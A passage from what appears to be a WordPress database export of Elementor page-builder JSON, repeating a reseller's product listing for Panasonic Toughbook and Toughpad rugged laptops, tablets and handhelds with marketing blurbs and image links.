\\u2014 it can handle it, making it the choice for unrelenting conditions. So take it to work. It can take it.<\\/p><p>[maxbutton id=\\\"5\\\" ]<\\/p><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6aba493\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3256f2d\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHPAD FZ-X1\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"b370c19\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/236380_F1X1_Hero.png\",\"id\":2603}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"1efa495\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>The TOUGHPAD\\u00ae FZ-X1 is the world\'s most rugged 5-inch tablet and a whole lot more. For the first time, you can pair military-grade toughness and enterprise-class mobile computing power with Android-powered 4G data and voice services. Now field staff in the most demanding environments can have all the computing power they need in a handheld tablet small enough to drop in a pocket. Built on the flexible, secure Android 5.1.1 OS, the FZ-X1 lets businesses leverage their existing investments in enterprise applications without sacrificing performance and ruggedness. And it is seriously rugged.\\u00a0Thirty minutes of under five feet of water rugged.\\u00a0Ten foot drops onto solid concrete rugged. Built-in heater for -4\\u00b0 F weather rugged. Whether you throw it in a toolbox or literally take it into battle, the FZ-X1 can handle whatever comes its way.<\\/p><p>[maxbutton id=\\\"5\\\" ]<\\/p><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"645131d\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"5ec8bc5\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"cea0ebe\",\"elType\":\"widget\",\"settings\":{\"title\":\"Tablets\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c92f938\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"bb0c96c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9e27fe8\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHBOOK L1\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f6ee69c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/fz-l1_right_ss.jpg\",\"id\":2609}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"636c2cc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>The Panasonic TOUGHBOOK L1 is a slim and sleek Android\\u2122 OS based\\u00a07\\\" tablet that proudly carries the TOUGHBOOK\\u00a0name. Its ability to be used\\u00a0in the enterprise to collect information from workers in retail stores,\\u00a0warehouses field service, transportation and delivery or many other\\u00a0environments where work must occur belies its mild looking exterior.\\u00a0The TOUGHBOOK L1 has a quad-core processor and optional straight-shooting\\u00a0barcode reader from portrait to landscape, use a stylus pen or connect\\u00a0to multi-carrier 4G LTE and provide the ease of use of the Andorid OS.\\u00a0This tablet\\u2019s users won\\u2019t miss a beat with its great battery life, glove and\\u00a0rain touch enabled 7\\\" screen, 5 foot drop rating and IP65 and IP67\\u00a0certification. The TOUGHBOOK L1 is ready to be used by satisfied end\\u00a0users everywhere in your organization.<\\/p><p>[maxbutton id=\\\"5\\\" ]<\\/p><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"d16c223\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ba5591e\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHPAD FZ-M1\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"ca8b0be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/fz-m1_image_01_new_win10.jpg\",\"id\":2610}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"30fc1f3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>The Panasonic FZ-M1 is the fully rugged Windows\\u00ae tablet, built to\\u00a0enable mission-critical mobile worker productivity without compromise. Powered\\u00a0by Windows\\u00ae 10 Pro, the FZ-M1 features a long life, user-replaceable\\u00a0battery and a daylight-readable, high-sensitivity multi-touch display for use\\u00a0with heavy gloves. With the broadest range of configuration options available in\\u00a0its class, the highly customizable FZ-M1 is the ideal tool for today\\u2019s\\u00a0mobile workforce. In addition to the highly configurable options, added models\\u00a0of Thermal Camera, Real Sense Camera, RTK\\/GPS, as well as several more.\\u00a0Allows the FZ-M1 to be the most comprehensive 7\\\" tablet in the market.<\\/p><p>[maxbutton id=\\\"5\\\" ]<\\/p><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ddfa1b6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ac4648e\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHPAD FZ-G1\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"ca5913e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/fz-g1mk5_us_image02_ss.jpg\",\"id\":2611}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"a32d55e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>The FZ-G1 Windows 10 Pro tablet offers a fluid user experience\\u00a0while providing crucial port connectivity and feature-rich options in a compact\\u00a0size. Designed for highly mobile field workers, it\\u2019s the thinnest and lightest\\u00a0fully rugged 10.1\\\" tablet running Windows 10 Pro 64-Bit. Powered by an\\u00a0Intel\\u00ae Core\\u2122 i5 vPro\\u2122 processor with a MIL-STD-810G and IP65 certified, the FZ-G1 Windows 10 tablet leads the way in rugged mobile\\u00a0computing. Add to that an HD daylight-readable 10-point gloved multi touch +\\u00a0waterproof digitizer pen, and it becomes an essential tool for field workers.\\u00a0With added Thermal camera and IR camera options.\\u00a0 Can also support \\\"Windows Hello\\\" for enhanced security.<\\/p><p>[maxbutton id=\\\"5\\\" ]<\\/p><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d7ecd2\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"ae2a70d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"b56dd64\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHPAD FZ-A2\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fb7e441\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/tb_fz_a2_hero_front-1.png\",\"id\":2612}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"705b4b6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>With the Android 6.0 (Marshmallow) operating system and Intel\\u00ae x5-Z8550 processor, the Panasonic TOUGHPAD\\u00ae A2 10.1-inch fully rugged Android\\u2122 tablet provides enterprise features and reliability miles ahead of consumer tablets. With the ability to be WWAN 4G LTE connected and a super-bright 800 NIT screen, it is the perfect solution for workers in the field. However demanding the job, the dependable TOUGHPAD\\u00a0FZ-A2 tablet is up to the task.<\\/p><p>[maxbutton id=\\\"5\\\" ]<\\/p><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34adf46\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"46a580a\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHPAD FZ-B2\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"3fc0690\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/prod-jtb2-hero.png\",\"id\":2613}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"0fedb48\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>The rugged, 7-inch Panasonic TOUGHPAD\\u00ae FZ-B2, now powered by Android\\u2122 6.0.1 (Marshmallow) and the latest Intel\\u00ae AtomTM x5-Z8550 processor is an easy-to-use, enterprise-grade productivity booster that works rain or shine. With durability, power and a range of configuration options \\u2013 at a price within reach of any business \\u2013 the TOUGHPAD\\u00a0FZ-B2 features a faster CPU, upgraded rear camera and Wi-Fi chipset, a quick-charging, user-replaceable full-shift battery and a Near Field Communications option. With a fully rugged and sealed design, the thin and lightweight TOUGHPAD\\u00a0FZ-B2 is built for long-lasting durability where others fail.<\\/p><p>[maxbutton id=\\\"5\\\" ]<\\/p><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(3691,2684,'_elementor_version','0.4'),(3694,2685,'_elementor_edit_mode','builder'),(3695,2685,'_elementor_template_type','post'),(3696,2685,'_wp_page_template','template-fullwidth.php'),(3697,2685,'_elementor_data','[{\"id\":\"292e187\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"19fa744\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"b9d3051\",\"elType\":\"widget\",\"settings\":{\"title\":\"Computer Toughbook\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"18d10b9\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"330ac40\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"52bc26e\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHBOOK 33\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e3edb98\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/tb_33_hero.png\",\"id\":2594}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"2aad3d3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\"><strong>PRODUCT<\\/strong> DETAILS<\\/h5><div class=\\\"field__item\\\"><p>The Panasonic TOUGHBOOK\\u00ae 33 is the first fully-rugged 2-in-1 of its kind\\u2014redefining rugged flexibility for those who work in demanding conditions. TOUGHBOOK 33 features a groundbreaking 3:2 display, making it easier to handle, while improving readability of the business applications and documents workers use every day. This innovative design also enables backward compatibility with an entire generation of TOUGHBOOK 31 vehicle docks. It\'s as versatile as your job demands it to be. From a brighter 12\\\" detachable screen with infrared camera for Windows Hello support, to hot-swappable twin batteries and a choice of keyboards\\u2014TOUGHBOOK 33 is built for maximum mobility.<\\/p><p><span style=\\\"font-size: 0.875rem;\\\">[maxbutton id=\\\"5\\\" ]<\\/span><\\/p><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6e91208\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":52},\"elements\":[{\"id\":\"be86921\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHBOOK 31\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5da701a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/tb31_win10.jpg\",\"id\":2593}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"4dfcd25\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<header class=\\\"product-details__header\\\"><\\/header><div class=\\\"buttons-bar product-details__dealers\\\"><h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><\\/div><div class=\\\"product-details__description\\\"><div class=\\\"field field--name-field-product-details field--type-text-long field--label-above\\\"><div class=\\\"field__item\\\"><p>Panasonic presents the TOUGHBOOK\\u00ae 31, the reliable laptop offering\\u00a0the world\\u2019s most rugged design. With drop-shock protection and a\\u00a0MIL-STD-810G certification, it\\u2019s the undisputed leader in the fully\\u00a0rugged category. Its Intel\\u00ae Core\\u2122 i5 processor packs a punch and it delivers amazing battery life\\u201419.5 hours, or 29 hours with the optional media bay\\u00a02nd battery. Combine six generations of delivering rugged performance\\u00a0plus an amazing 18 years of consistent docking compatibility, TOUGHBOOK 31 is a laptop that will go the distance with you anytime, anywhere.<\\/p><p><span style=\\\"font-size: 0.875rem;\\\">[maxbutton id=\\\"5\\\" ]<\\/span><\\/p><\\/div><\\/div><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"bb47d1c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9db1fee\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHBOOK 54\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"15ce475\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/tb_54_hero.png\",\"id\":2595}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6a00781\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>A semi-rugged 14\\u201d laptop, the TOUGHBOOK 54 is the world\'s thinnest and lightest semi-rugged in its class, but now packs even more of a punch. The TOUGHBOOK 54 is now available with 7th Gen Intel\\u00ae processors running Windows\\u00ae 10 Pro and feature a spill-resistant, full magnesium alloy design, storage drive heater and backlit keyboard. The TOUGHBOOK 54 has a wide range of integrated options such as dedicated GPS, 4G LTE mobile broadband with satellite GPS, and dual antenna pass-through. It offers an optional second battery, allowing hot swap battery replacement without the need to shut down or hibernate. The TOUGHBOOK 54 one of the most versatile and advanced semi-rugged notebooks on the market.<\\/p><p><span style=\\\"font-size: 0.875rem;\\\">[maxbutton id=\\\"5\\\" ]<\\/span><\\/p><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3bc7e77\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"f01603d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"75026de\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"c5649b0\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"1a9a32a\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"c925bd0\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHBOOK 20\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4b619a0\",\"elType\":\"widget\",\"settings\":{\"image_size\":\"medium\",\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/20mk2_laptop_right_angle_detached-1.jpg\",\"id\":2596}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9e46753\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>The Panasonic TOUGHBOOK\\u00ae 20 is a fully rugged, lightweight laptop that easily detaches to become a 10.1\\\" tablet. And it only takes one hand. The detachable laptop has a magnesium alloy chassis and is also MIL-STD-810G and IP65 certified, so it can take the abuse of most any job site. At only 3.9 pounds, this 2-in-1 machine is good on the go. The clever built-in handle also functions as a kickstand, providing on-the-job flexibility. And even as the workday gets longer, power won\'t be a problem. The optional bridge battery allows hot swap battery replacement without disruption. The gloved multi touch display is sunlight-viewable, making this hybrid laptop perfect for rugged outdoor environments. With this detachable laptop tablet at your side, you can handle anything the workday throws at you.<\\/p><p><span style=\\\"font-size: 0.875rem;\\\">[maxbutton id=\\\"5\\\" ]<\\/span><\\/p><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"5c9e08f\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"830958b\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHPAD FZ-Q2\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4d72a50\",\"elType\":\"widget\",\"settings\":{\"image_size\":\"medium\",\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/toughpad-q2-hero.png\",\"id\":2597}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"f07ddc4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>From the industry leader in reliability comes the Panasonic TOUGHPAD\\u00ae FZ-Q2 12.5-inch 2-in-1 Windows\\u00ae 10 PC. Built with the rugged durability consumers have come to expect from TOUGHBOOK, this PC is designed for users who need more from their computer than what a typical consumer device can provide. Enhanced with features like a superior battery life and additional ports, the TOUGHPAD FZ-Q2 semi-rugged convertible tablet also possesses a full HD display with an anti-reflective touchscreen along with a spill-resistant keyboard to maximize usability in the field or in the office.<\\/p><p><span style=\\\"font-size: 0.875rem;\\\">[maxbutton id=\\\"5\\\" ]<\\/span><\\/p><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"816152c\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"488a087\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"fb85606\",\"elType\":\"widget\",\"settings\":{\"title\":\"Handhelds\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"fda2a67\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"b29f967\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b63ad5d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"711ad8e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"68ee5f8\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"32bd399\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b342b76\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHBOOK T1\",\"header_size\":\"h4\",\"align\":\"center\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"284c9f7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/fz-t1_image1-1_ss_1.jpg\",\"id\":2601}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"8fca4ad\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>The Panasonic TOUGHBOOK\\u00ae\\u00a0T1 is a slim and sleek Android OS based handheld that proudly carries the TOUGHBOOK\\u00a0name. Its ability to be used in the enterprise to collect information from workers in retail stores, warehouses field service, transportation and delivery or many other environments where work must occur belies its mild looking exterior. The FZ-T1 has a quad-core processor and a straight-shooting barcode reader, options to have a pistol grip with trigger, use a stylus pen or connect to multi-carrier 4G LTE with voice capability, yet end users will feel comfortable with its Android OS. This handheld\'s users won\\u2019t miss a beat with its great battery life, glove and rain touch enabled 5\\\" screen, 5 foot drop rating and IP66 and IP68 certification.\\u00a0 The TOUGHBOOK\\u00a0T1 is ready to be used by satisfied end users everywhere in your organization.<\\/p><p>[maxbutton id=\\\"5\\\" ]<\\/p><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c1dba18\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":60},\"elements\":[{\"id\":\"ed06566\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHBOOK N1\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"57df093\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/fz-n1_mk2_android_image_2_1.jpg\",\"id\":2604}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"380b880\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>The Panasonic TOUGHBOOK\\u00ae N1 \\u2014 a powerful, slim and fully rugged handheld. It\\u2019s the all-in-one tool you\\u2019ve been waiting for, and it\\u2019s ideal for where work takes you each day. With an octa-core processor, angled rear-facing barcode reader, optional stylus pen, and long-lasting battery that is warm-swappable; you won\\u2019t miss a beat. And when a flexible device is in demand, the TOUGHBOOK N1 delivers the Android\\u2122 operating system,\\u00a0giving you the ability to develop in an open environment with thousands of enterprise grade applications at your fingertips from the Google Play store or Panasonic\'s partners: independent software vendors (ISVs) and resellers\\/integrators. Plus, with built-in multi-carrier 4G LTE, voice capabilities, and dual SIM cards, the TOUGHBOOK N1 is ready to go where business takes you. And if it takes a seven-foot drop, don\\u2019t worry \\u2014 it can handle it, making it the choice for unrelenting conditions. So take it to work. It can take it.<\\/p><p>[maxbutton id=\\\"5\\\" ]<\\/p><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6aba493\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3256f2d\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHPAD FZ-X1\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"b370c19\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/236380_F1X1_Hero.png\",\"id\":2603}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"1efa495\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>The TOUGHPAD\\u00ae FZ-X1 is the world\'s most rugged 5-inch tablet and a whole lot more. For the first time, you can pair military-grade toughness and enterprise-class mobile computing power with Android-powered 4G data and voice services. Now field staff in the most demanding environments can have all the computing power they need in a handheld tablet small enough to drop in a pocket. Built on the flexible, secure Android 5.1.1 OS, the FZ-X1 lets businesses leverage their existing investments in enterprise applications without sacrificing performance and ruggedness. And it is seriously rugged.\\u00a0Thirty minutes of under five feet of water rugged.\\u00a0Ten foot drops onto solid concrete rugged. Built-in heater for -4\\u00b0 F weather rugged. Whether you throw it in a toolbox or literally take it into battle, the FZ-X1 can handle whatever comes its way.<\\/p><p>[maxbutton id=\\\"5\\\" ]<\\/p><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"645131d\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"5ec8bc5\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"cea0ebe\",\"elType\":\"widget\",\"settings\":{\"title\":\"Tablets\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c92f938\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"bb0c96c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9e27fe8\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHBOOK L1\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f6ee69c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/fz-l1_right_ss.jpg\",\"id\":2609}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"636c2cc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>The Panasonic TOUGHBOOK L1 is a slim and sleek Android\\u2122 OS based\\u00a07\\\" tablet that proudly carries the TOUGHBOOK\\u00a0name. Its ability to be used\\u00a0in the enterprise to collect information from workers in retail stores,\\u00a0warehouses field service, transportation and delivery or many other\\u00a0environments where work must occur belies its mild looking exterior.\\u00a0The TOUGHBOOK L1 has a quad-core processor and optional straight-shooting\\u00a0barcode reader from portrait to landscape, use a stylus pen or connect\\u00a0to multi-carrier 4G LTE and provide the ease of use of the Andorid OS.\\u00a0This tablet\\u2019s users won\\u2019t miss a beat with its great battery life, glove and\\u00a0rain touch enabled 7\\\" screen, 5 foot drop rating and IP65 and IP67\\u00a0certification. The TOUGHBOOK L1 is ready to be used by satisfied end\\u00a0users everywhere in your organization.<\\/p><p>[maxbutton id=\\\"5\\\" ]<\\/p><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"d16c223\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ba5591e\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHPAD FZ-M1\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"ca8b0be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/fz-m1_image_01_new_win10.jpg\",\"id\":2610}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"30fc1f3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>The Panasonic FZ-M1 is the fully rugged Windows\\u00ae tablet, built to\\u00a0enable mission-critical mobile worker productivity without compromise. Powered\\u00a0by Windows\\u00ae 10 Pro, the FZ-M1 features a long life, user-replaceable\\u00a0battery and a daylight-readable, high-sensitivity multi-touch display for use\\u00a0with heavy gloves. With the broadest range of configuration options available in\\u00a0its class, the highly customizable FZ-M1 is the ideal tool for today\\u2019s\\u00a0mobile workforce. In addition to the highly configurable options, added models\\u00a0of Thermal Camera, Real Sense Camera, RTK\\/GPS, as well as several more.\\u00a0Allows the FZ-M1 to be the most comprehensive 7\\\" tablet in the 